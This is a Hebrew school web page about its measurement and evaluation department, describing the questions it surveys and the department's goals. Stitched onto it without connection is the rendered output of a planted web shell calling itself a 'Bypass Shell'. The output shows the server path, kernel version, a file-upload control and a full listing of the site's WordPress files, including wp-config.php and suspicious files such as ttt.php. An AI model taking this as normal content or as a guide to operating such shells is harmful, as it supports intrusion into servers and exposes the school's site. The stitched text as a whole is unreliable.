מדידה והערכה

מה חושבים התלמידים על הלימודים בבית הספר? מהן עמדותיהם כלפי המושג למידה? באיזו מידה הלימודים ממשיכים להעסיק אותם גם בשעות אחר הצהריים? כיצד הם תופסים את הקשר שלהם עם החונך? ומהן עמדותיהם ותחושותיהם ביחס למפגשי החניכה? באיזו מידה תופסים המורים את הלמידה כתהליך ארוך טווח? באיזו מידה הם תופסים את עצמם כלומדים? מה עושה מורה שחש צורך בהתפתחות מקצועית? וכיצד מעריכים המורים את המסגרות הבית ספריות להתפתחות? מהן עמדותיהם של ההורים כלפי אופני הלמידה בבית הספר? מהן עמדותיהם כלפי המעורבות של ילדיהם בלמידה? כיצד הם תופסים את הקשר של ילדיהם עם החונך? וכיצד הם תופסים את הקשר שלהם עצמם עמו?

בשאלות כגון אלו עוסקת מחלקת המדידה וההערכה של בית הספר. המחלקה הוקמה בעקבות תכנית האב של בית הספר שנכתבה בשנת ה- 90 להיווסדו. הרציונל להקמתה: "ויסות עצמי ורמת מודעות גבוהה הם תנאי בסיסי לקיומו האיכותי של כל ארגון ולהתקדמותו בעולם המשתנה. לפיכך נדרשים הערכה, רפלקציה ומשוב תמידיים אשר יאפשר את הוויסות העצמי ואת רמת המודעות הנדרשת ויקדמו את בית הספר באופן מתמיד".

מערך ההערכה הבית ספרי הוא מכלול של תהליכי התפתחות ולמידה שיטתיים וארוכי טווח, שתכליתם:

  • לכוון את תהליכי הניהול, החינוך וההוראה בבית הספר באופן ממוקד ומדויק ככל האפשר
  • לעצב תרבות ניהולית המבוססת על נתונים ולא רק על תחושות בטן כרקע ללימוד המצב ולקבלת החלטות
  • ללמוד נקודות הראויות לשיפור או לשימור הנוגעות לכלל האוכלוסייה בבית הספר, בחתכים שונים
  • להפיק לקחים ולגזור מהם תכניות עבודה

העבודה במחלקה מתבצעת על פי המתודולוגיה המקובלת בתחום של מדידה והערכה.

El Moujahidin Bypass Shell

Current Path : /home/reali/public_html/

Linux danreali 3.13.0-68-generic #111-Ubuntu SMP Fri Nov 6 18:17:06 UTC 2015 x86_64
Upload File :

Name
Size
Permissions
Options
.usermin
--
drwx------
biram-courses-2017
--
drwxr-xr-x
booklet
--
drwxr-xr-x
invention
--
drwxr-xr-x
maps
--
drwxr-xr-x
meydaon-biram
--
drwxr-xr-x
org
--
drwxr-xr-x
phpmyadmin
--
drwxr-xr-x
reali-100
--
drwxr-xr-x
reg
--
drwxr-xr-x
shapira
--
drwxr-xr-x
shapira-2014
--
drwxr-xr-x
truma
--
drwxr-xr-x
wp-admin
--
drwxr-xr-x
wp-content
--
drwxr-xr-x
wp-includes
--
drwxr-xr-x
.htaccess
0.678 KB
-rw-r--r--
google3b31a5353cb3d20d.html
0.052 KB
-rw-r--r--
index.php
0.408 KB
-rw-r--r--
license.txt
19.468 KB
-rw-r--r--
readme.html
7.259 KB
-rw-r--r--
ttt.php
0.067 KB
-rw-r--r--
wp-activate.php
5.319 KB
-rw-r--r--
wp-blog-header.php
0.355 KB
-rw-r--r--
wp-class.php
25.106 KB
-rw-r--r--
wp-comments-post.php
1.589 KB
-rw-r--r--
wp-config-sample.php
2.786 KB
-rw-r--r--
wp-config.php
3.874 KB
-rw-r--r--
wp-cron.php
3.209 KB
-rw-r--r--
wp-links-opml.php
2.365 KB
-rw-r--r--
wp-load.php
3.224 KB
-rw-r--r--
wp-login.php
33.144 KB
-rw-r--r--
wp-mail.php
7.859 KB
-rw-r--r--
wp-settings.php
15.874 KB
-rw-r--r--
wp-signup.php
29.195 KB
-rw-r--r--
wp-trackback.php
4.407 KB
-rw-r--r--
xmlrpc.php
2.993 KB
-rw-r--r--

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: [email protected]